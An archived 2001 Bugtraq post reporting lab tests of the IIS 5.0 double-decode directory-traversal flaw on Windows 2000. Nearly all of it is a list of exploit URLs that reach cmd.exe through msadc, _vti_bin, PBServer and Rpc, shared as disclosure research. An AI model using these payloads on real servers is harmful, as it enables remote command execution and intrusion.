Bugtraq mailing list archives
Nsfocus advisory testing
From: Aldo Albuquerque - Segurança de Sistemas <aldo () cesar org br>
Date: Wed, 16 May 2001 00:18:05 -0300
Hi, We tested various settings in our lab, with different encoding combinations, executable directories, and Win32 configurations. Curiously, not all combinations worked quite the same way on Windows 2000 Server and Professional (even discounting the fact that certain directories exist in one and not in the other, like PBServer or Rpc). - Windows 2000 Professional + SP1 + IIS5.0 - Default installation * The following combinations of directories/encodings work: http://www.target.com/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd .exe?/c+dir+c:\ http://www.target.com/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd .exe?/c+dir+c:\ http://www.target.com/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system 32/cmd.exe?/c+dir+c:\ http://www.target.com/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/ system32/cmd.exe?/c+dir+c:\ http://www.target.com/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.e xe?/c+dir+c:\ http://www.target.com/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.e xe?/c+dir+c:\ http://www.target.com/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system 32/cmd.exe?/c+dir+c:\ http://www.target.com/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winn t/system32/cmd.exe?/c+dir+c:\ http://www.target.com/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/s ystem32/cmd.exe?/c+dir+c:\ http://www.target.com/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/s ystem32/cmd.exe?/c+dir+c:\ http://www.target.com/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63 ../winnt/system32/cmd.exe?/c+dir+c:\ http://www.target.com/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63. .%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\ - Windows 2000 Server + SP1 + IIS5.0 - Default installation * The following combinations of directories/encodings work: http://www.target.com/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/ c+dir+c:\ http://www.target.com/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/ c+dir+c:\ http://www.target.com/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd .exe?/c+dir+c:\ http://www.target.com/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system 32/cmd.exe?/c+dir+c:\ http://www.target.com/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir +c:\ http://www.target.com/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir +c:\ http://www.target.com/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe? /c+dir+c:\ http://www.target.com/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cm d.exe?/c+dir+c:\ http://www.target.com/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/s ystem32/cmd.exe?/c+dir+c:\ http://www.target.com/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/s ystem32/cmd.exe?/c+dir+c:\ http://www.target.com/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63 ../winnt/system32/cmd.exe?/c+dir+c:\ http://www.target.com/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63. .%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\ It would be interesting if tests were also made by others in NT 4.0 SP6a, since we did not test combinations with other commonly-installed directories, such as cgi-bin, adsamples, _vti_cnf,iisadmpwd, etc. Regards, Aldo Albuquerque - CCSA Tempest Security Technologies - http://www.tempest.com.br CESAR - Centro de Estudos e Sistemas Avançados do Recife - http://www.cesar.org.br
Current thread:
- Nsfocus advisory testing Aldo Albuquerque - Segurança de Sistemas (May 16)